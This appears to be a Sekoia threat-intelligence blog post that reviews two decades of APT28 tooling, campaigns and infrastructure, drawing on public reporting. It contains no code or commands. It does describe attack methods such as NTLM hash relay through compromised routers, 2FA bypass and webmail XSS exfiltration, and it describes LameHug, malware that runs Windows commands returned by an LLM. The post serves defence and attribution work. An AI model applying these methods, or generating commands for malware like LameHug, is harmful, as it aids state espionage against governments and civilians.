Context

Sekoia’s Threat Detection & Research (TDR) team has been tracking APT28 for several years. The intrusion set, also known as Fancy Bear, Forest Blizzard, Sofacy, Pawn Storm or Sednit and publicly attributed to the GRU’s Unit 26165, is one of the most prolific and persistent state-sponsored actors we monitor. Its operations span in two decades and consistently target government, defence, diplomatic and critical infrastructure entities, with a focus on NATO members and Ukraine.

Given its relentless activity, this intrusion-set has been extensively documented by government agencies, private cybersecurity vendors, and independent researchers. The scale of this collective coverage is reflected in the list of aliases we have compiled: That’s 33 names for one adversary.

Since 2025, we have been working with several foreign and domestic law enforcement and government agencies, including the FBI, as part of broader efforts to limit this intrusion set’s activities. Our recent publication on the infection chain of the Operation Phantom Net Voxel campaign is one example of this work. In 2026, this cooperation is part of a wider coordinated publication effort conducted alongside government agencies and private vendors, with the shared goal of constraining GRU cyber operations. The present report contributes to this collective momentum, with a different angle: it looks back at how APT28’s arsenal has evolved over time.

This report is not an exhaustive review. Our analysis is built on open source documentation. We have chosen to focus on what we consider the most significant shifts in APT28’s tradecraft, in order to understand how the intrusion-set’s arsenal has evolved from its earliest known operations to the activity we see today. We assume that a meaningful portion of APT28’s activity has never been disclosed publicly, which inevitably limits what we can analyse. We do not claim to provide a definitive analysis of the intrusion-set, and this report should be read as a modest overview rather than a comprehensive one.

That said, the open-source material available today and our TDR team’s research are sufficient to highlight several meaningful changes in APT28’s tooling, infrastructure, and operational tempo. 

The timeline below can be read as a sequence of operational eras, each marked by a shift in tooling, targeting or tradecraft.

Note: The dates shown here refer to the dates of the operations, not the dates of the open-source releases.

Two decades of APT28 tradecraft

2004 – 2018: The signature implant era and the hack-and-leak playbook

For more than a decade, APT28 ran a stable in-house implant chain across its most high-profile breaches. In parallel, the intrusion-set built the hack-and-leak playbook that would later define the 2016 US election interference, with a first iteration tested against Ukraine in 2014.

The implant chain stayed consistent during this period. Spear phishing campaigns or the SedKit exploit kit delivered the Seduploader first stage. The attackers then upgraded valuable targets to the X-Agent backdoor, often pairing it with the Sedreco loader and the X-Tunnel network pivot. ESET's 2016 paper En Route with Sednit is still the main reference for understanding this toolkit.

However, the earliest reporting actually came from Trend Micro and Google. Trend Micro's 2014 Operation Pawn Storm stands as a core early reference. Google also released a key paper in 2014 and made their attribution. They linked the operation to Russian military intelligence by naming their report Peering Into Our Main Intelligence Directorate (GRU) Blind Spot.

The same arsenal turns up in the period's emblematic incidents:

• TV5Monde in April 2015: a disruptive operation run under the fake "CyberCaliphate" impersonating ISIS cyber offensive capacities, attributed to APT28. This operation was assessed to be a Russian retaliation against the cancellation of the delivery of two French Mistral helicopter carriers ordered by Russia in 2010, following its 2014 involvement in the annexation of Crimea and the war in Donbas.
• Bundestag in May 2015: roughly 16 GB exfiltrated, a possible Russian retaliation toward Germany for leading EU sanctions amid Russia's 2014 annexation of Crimea. The EU Council imposed sanctions in October 2020 on the APT28 members involved.
• World Anti-Doping Agency in August 2016: weeks after the McLaren Report exposed Russia's state-sponsored doping programme and triggered sanctions against Russian athletes ahead of the Rio Olympics, athlete medical records exfiltrated and leaked through a "Fancy Bears" hacktivist front, using the same in-house toolkit as the rest of the period.
• US Democratic Party’s DCCC, DNC and Clinton campaign, March to October 2016: documented in the US DOJ Mueller indictment of 13 July 2018 and the Mueller Report of April 2019, with the implants analysed in the ESET report. The toolkit was unchanged: X-Agent for keylogging and screenshotting, X-Tunnel for exfiltration, Mimikatz for credential theft. Of note, both APT28 and APT29 (attributed to Russia’s foreign intelligence service SVR) were observed looking to compromise the same target, which suggests a possibility of executive-initiated priority targeting.

From March 2014, the "Cyber Berkut" persona ran DDoS, doxing and document leaks against Ukrainian government, NATO and German targets, most notably the attempted sabotage of Ukraine's May 2014 presidential election. In 2018, the UK Foreign and Commonwealth Office, alongside the NCSC, listed Cyber Berkut as one of the GRU's known fronts. An analysis by Recorded Future in 2015 mapped the persona's shift from DDoS stunts to coordinated leaks of confidential Ukrainian documents. 

2015 – 2024: The Mueller fallout and the five year blind spot

From late 2015 onwards, APT28 introduced a parallel first-stage family named Zebrocy. Its defining feature is that the same downloader and backdoor was rewritten across many languages, while keeping the same operational role and the same victims: embassies and ministries of foreign affairs across Eastern Europe and Central Asia. The attribution of Zebrocy to APT28 is considered as medium confidence. Kaspersky treats it as a separate subgroup, while ESET integrates it into the main intrusion set. ESET documented the family in 2018, and Kaspersky covered it in their APT trends reports from 2017 to 2019. The Go variant of the backdoor was also described in a 2020 CISA Malware Analysis Report. We documented the Double-Tap campaign, which links back to older Zebrocy operations and the cluster tracked as UAC-0063 and attribute this activity to APT28 with medium confidence.

This era marks a major turning point for the intrusion-set. In 2019, the US Department of Justice released the Mueller Report, which exposed the GRU and APT28 operations. After this publication, we can observe a gap in the timeline. The intrusion set likely retooled to avoid the spotlight generated by the Mueller Report. A second factor may also be at play: the first Trump administration's open scepticism toward the Russia attribution narrative, widely framed at the time as a Democratic effort to undermine his election, likely dampened both US intelligence focus on APT28 and the willingness of US-based security vendors to publish on the subject.

However, they were still active. In parallel, APT28 maintained a custom Windows privilege-escalation utility called GooseEgg. Microsoft Threat Intelligence disclosed it in 2024 and assessed that the tool had been in use since at least June 2020, possibly as early as April 2019. GooseEgg weaponises CVE-2022-38028 in the Windows Print Spooler service to obtain SYSTEM-level execution. Targets named by Microsoft span Ukrainian, Western European and North American government, NGO, education and transportation entities. The most important takeaway is the gap: five years between operational use and public disclosure.

2022 – 2024: From monolithic implants to disposable, single-task modules

This phase marks a clear break with the X-Agent era. APT28 split its toolkit into short-lived, single-purpose codes and, in parallel, weaponised a zero-click Outlook flaw to harvest Net-NTLMv2 hashes from European government and military targets.

The fragmentation is documented by CERT-UA in 2023 and IBM X-Force "ITG05" in 2024. Each new component is delivered through phishing, scoped to one task, and replaced as soon as it is burned:

• HeadLace: multi-component backdoor (CMD/VBS/BAT).
• CredoMap: browser credential stealer.
• MASEPIE: Python downloader, abuses the Windows URI handler with WebDAV staging.
• OCEANMAP: C# backdoor, described by IBM X-Force as a more capable successor of CredoMap, uses IMAP drafts for C2.
• STEELHOOK: PowerShell script targeting Chromium-based browser data.

Each malware covers one step of the chain: loading, stealing, and persistence. Most are wiped from infrastructure within days of disclosure. Targets are predominantly Ukrainian government entities and Polish organisations.

The Outlook harvest runs in parallel. APT28 weaponised the zero-click flaw CVE-2023-23397, patched by Microsoft in March 2023 after a CERT-UA report. In-the-wild exploitation ran from April to December 2022 against European government, military, energy and transportation targets, per Microsoft MSRC. 

Continued exploitation through 2023 and 2024 is reported in the joint FBI / NSA / US Cyber Command advisory in 2024. Crafted Outlook reminders force the client to authenticate to attacker-controlled SMB shares. The captured Net-NTLMv2 hashes are then relayed via compromised edge routers to harvest credentials for later reuse..

2023 – 2026: Moving operational infrastructure to the edge

This is probably the most important structural shift of the recent period. APT28 systematically moved large parts of its operational infrastructure onto compromised SOHO and edge devices, rather than relying only on rented VPS. The result is a pool of attacker-controlled IPs that look like legitimate consumer traffic, hard to block and to attribute.

The MooBot campaign is the first publicly announced law enforcement agency disruption operation targeting APT28 capacities. The FBI's "Operation Dying Ember", announced by the US DOJ in 2024 and summarised in the joint advisory, dismantled a network of hundreds of Ubiquiti edge routers. The botnet was originally built by criminals using the MooBot malware. APT28 used it over in April 2022 and included the botnet into three distinct uses:

• Relaying the Net-NTLMv2 hashes captured through CVE-2023-23397 toward Microsoft Exchange, allowing mailbox takeover without any tooling on the victim's network.
• Hosting phishing landing pages and credential-collection proxies on residential IPs, which sat below the radar of most reputation-based filtering.
• Staging custom Python scripts to scrape webmail credentials from the routers themselves, keeping heavier tooling off the operator's central infrastructure.

Trend Micro's follow-up 2024 showed that more than 350 datacenter VPS were still calling back to actor infrastructure even after the takedown, highlighting how persistent this kind of botnet is once seeded.

In 2026, the FrostArmada campaign generalised the same idea to MikroTik and TP-Link routers. The campaign was disclosed by four sources within the span of a few days in April 2026:

• Lumen Black Lotus Labs provided the initial technical breakdown of the DNS-hijacking method and the victimology.
• Microsoft Threat Intelligence detailed the Adversary-in-the-Middle chain against Microsoft 365.
• UK NCSC advisory confirmed attribution and issued defensive guidance for UK government and critical-sector organisations.
• FBI Internet Crime Complaint Center published a consumer-facing public-service alert covering router owners and small businesses.

The DNS resolvers on compromised routers were rewritten to point to APT28-controlled servers, inherited by every downstream client. Authentication traffic toward Microsoft 365 and similar services was then funnelled through Adversary-in-the-Middle nodes for credential and OAuth-token harvesting. At its peak in December 2025, Lumen observed more than 18,000 unique IPs across 120+ countries communicating with the infrastructure. Microsoft identified roughly 200 organisations and 5,000 consumer devices affected, primarily foreign ministries, law enforcement, IT and hosting providers.

2023 – 2025: Industrialised collection against Ukrainian civilian targets

While the edge router pivot was being built, APT28 ran a parallel collection effort aimed at Ukrainian civil society at scale. Two complementary techniques were used: client-side phishing of webmail users, and server-side exploitation of webmail platforms themselves. Phishing against UKR.NET has been documented across multiple reports:

• CERT-UA in 2022: warned about an early variant of the campaign using fake password-change pages and Pipedream endpoints.
• Sekoia in 2023: we documented three distinct credential-harvesting techniques active against UKR.NET at the time: a Browser-in-the-Browser lure impersonating the Centre for Defence Strategies, webhook-based exfiltration via Pipedream and Webhook.site for single-factor accounts, and a Python backdoor hosted on compromised Ubiquiti routers to bypass 2FA, automatically provision IMAP access and suppress UKR.NET security notification.
• Recorded Future in 2025: covers the sustained operation between June 2024 and April 2025, with at least 42 distinct credential-harvesting chains.

UKR.NET counts roughly half of the Ukrainian population among its users. Compromising accounts at scale provides asymmetric visibility into civil society, volunteer logistics and military-adjacent coordination, complementing battlefield intelligence. 

The pattern is consistent. Spear-phishing emails carry PDFs with shortened URLs. Targets click through a chain of redirections hosted on free and legitimate platforms (like Mocky), before landing on a convincing UKR.NET fake login clone. Two technical points stand out:

• Stolen credentials are exfiltrated to free HTTP webhook services such as Pipedream and Webhook, used as disposable collection endpoints.
• For 2FA-protected accounts, a Python script on a compromised Ubiquiti router validates the second factor, enables IMAP, stores the new app password and deletes the UKR.NET alert email.

Operation RoundPress takes the opposite approach. Instead of phishing users, APT28 hits the webmail servers directly. The campaign is documented by ESET in 2025 and attributed to APT28 with medium confidence, based on overlaps in sender infrastructure with previously documented campaigns. This activity has been observed since 2023 and intensified during 2024.

A spear-phishing email triggers a cross-site scripting vulnerability in the victim's webmail client. JavaScript runs in the context of the mailbox and exfiltrates contents to attacker infrastructure. The payload family is tracked as SpyPress, with one variant per webmail platform (Roundcube, Horde, MDaemon, Zimbra).

Victims include Ukrainian government bodies, defence companies in Bulgaria and Romania producing Soviet-era equipment for Ukraine, and a smaller number of government, military and academic targets in Africa, the EU and South America.

2024 – 2026: The signature implant era is back

After roughly five years dominated by short-lived script-based implants, APT28's in-house development team resurfaced. Operation Phantom Net Voxel is the modern equivalent of the X-Agent / X-Tunnel stack: a tiered, modular, cloud-resident toolset built to last. Three reports anchor the analysis: CERT-UA in June 2025, Sekoia Operation Phantom Net Voxel in September 2025 and ESET Sednit Reloaded in March 2026.

Initial access is unusual. APT28 sends weaponised Office documents through private Signal Desktop chats, probably taking advantage of the fact that the client does not apply Mark-of-the-Web protection. Lures are themed around Ukrainian military administration, which points at front-line soldiers and military HR or logistics personnel.

The infection chain stages a customised Covenant framework deployment in memory. The real innovation sits on the C2 side. Instead of standard HTTP, APT28 built a custom bridge that uses the legitimate Koofr cloud service, with tasks and results travelling as encrypted files inside the operator's Koofr account.

On the highest-priority targets, APT28 escalates to BeardShell, a custom C++ backdoor that uses the icedrive cloud API for C2. The implant is built to swap cloud providers easily, which matches what we observed in August 2025: the same chain was reused with a different lure and a switch to the legitimate Filen cloud service.

CERT-UA also reported a C++ keylogger named Slimagent on the same operator infrastructure. ESET ties Slimagent and BeardShell to direct X-Agent code lineage, with a data-collection loop nearly identical to APT28 samples observed against two European governments as far back as 2018.

The new operational baseline combines a customised in-memory Covenant deployment, a full-custom C++ escalation backdoor, a rotating set of legitimate clouds for C2, and a direct code lineage back to X-Agent.

2025 - 2026: And now, malware talks to an LLM

LameHug is the first APT28 malware observed delegating its operational logic to a large language model. The campaign was disclosed by CERT-UA in 2025, with corroborating analysis from Cato Networks CTRL. Attribution to APT28 is at medium confidence.The malware is delivered through spear-phishing against Ukrainian executive government authorities. It contains no hardcoded attacker logic. Instead, it carries base64-encoded natural-language prompts, queries Alibaba's Qwen 2.5-Coder-32B-Instruct model through the Hugging Face Inference API, and runs the Windows commands the model returns. Output is collected from Documents, Desktop and Downloads, then exfiltrated over SFTP or HTTP. This campaign is described as a proof of concept.

Conclusion

Looking back at more than two decades of APT28 activity, what stands out is constant layering of tradecraft. The X-Agent / X-Tunnel stack that defined the intrusion-set between 2004 and 2018 was never fully retired: its code lineage resurfaces today in BeardShell and Slimagent, and its operational logic still drives Operation Phantom Net Voxel. 

What also makes this intrusion-set unique is their physical reach. To our knowledge, APT28 is the only intrusion-set where we see a clear and proven link between remote cyber operations and close access operations (1, 2, 3).

Three shifts mark the recent period:

• The toolkit has fragmented and re-consolidated in parallel: short-lived single-purpose modules now coexist with a hardened in-house implant chain, and both are used at the same time depending on the target tier.
• The operational infrastructure has moved to the edge: compromised SOHO devices and legitimate abused cloud-storage now carry the load that rented VPS used to.
• APT28 is experimenting its arsenal with the LameHug LLM-driven infostealer. It’s still as a proof of concept, but the fact that it was deployed against Ukrainian executive bodies indicates that LLM command logic is no longer a research curiosity.

The TDR team will continue to track APT28 closely, sharing technical findings through public reporting, supporting the wider community with tooling such as RePythonNet, and pursuing collaboration with law enforcement agencies to disrupt the intrusion-set’s operations.

Note: if you believe your research deserves to be referenced in this timeline, feel free to reach out at tdr[at]sekoia.io. Please note that we only consider publications from cybersecurity vendors or government agencies.

Thank you for reading this blog post. Please don’t hesitate to provide your feedback on our publications by clicking here. You can also contact us at tdr[at]sekoia.io for further discussions or future IOCs.

Share this post: